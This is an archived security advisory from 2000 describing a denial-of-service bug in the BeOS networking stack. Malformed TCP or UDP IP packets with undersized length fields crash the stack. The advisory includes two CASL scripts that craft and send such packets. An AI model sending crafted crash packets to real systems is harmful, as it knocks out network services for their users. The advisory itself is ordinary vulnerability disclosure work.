exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

beos.dos.txt

beos.dos.txt
Posted Apr 8, 2000
Authored by Tim Newsham

The BeOS networking stack crashes when certain malformed packets are sent to it. This document explains two such packets and includes CASL scripts for packet generation.

tags | exploit
systems | beos
SHA-256 | d267418dd2b86fdb9dab0a8c84aa6d92238e386e740362ea438da2dfde622def

beos.dos.txt

Change Mirror Download
Problem:
It is possible to crash the BeOS networking process.

Discussion:
The BeOS networking stack crashes when certain malformed packets
are sent to it. This document explains two such packets. The
first is an IP packet with the protocol field set to TCP. If the
IP length field is set to be shorter than 40, it will crash the
networking process on reception. Similarly, an IP packet with
protocol field set to UDP with an IP length of less than 28 also
crashes the stack. The lengths 40 and 28 correspond with the
minimum sizes of the IP and TCP headers, and the IP and UDP headers
respectively.

Because the networking stack is a seperate process in BeOS, it may
be easily restarted after it crashes.

A bug report has been filed with Be and assigned the bug number of
20000405-18674. Be has marked the bug as "Will Not Fix" with the
comment "The entire networking system will be replaced soon."

This bug was found with the help of the ISIC utility by Mike Frantzen.

Two CASL scripts which demonstrate the bug are listed below.

References:
http://www.be.com/ - Be's website. BeOS is available for download
free of charge.

http://bebugs.be.com/devbugs/ - Be's bug tracking database.

http://expert.cc.purdue.edu/~frantzen/ - The homepage of the
ISIC author.

ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting
language CASL is available for download free of charge.

Script 1:
#!/usr/local/casl/bin/casl

#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"

srchost = 10.0.0.1;
dsthost = 10.0.0.2;

IPH = copy UDPIP;

IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;

packet = [ IPH ];
ip_output(packet);

Script 2:
#!/usr/local/casl/bin/casl

#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"

srchost = 10.0.0.1;
dsthost = 10.0.0.2;

IPH = copy TCPIP;

IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;

packet = [ IPH ];
ip_output(packet);


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    9 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close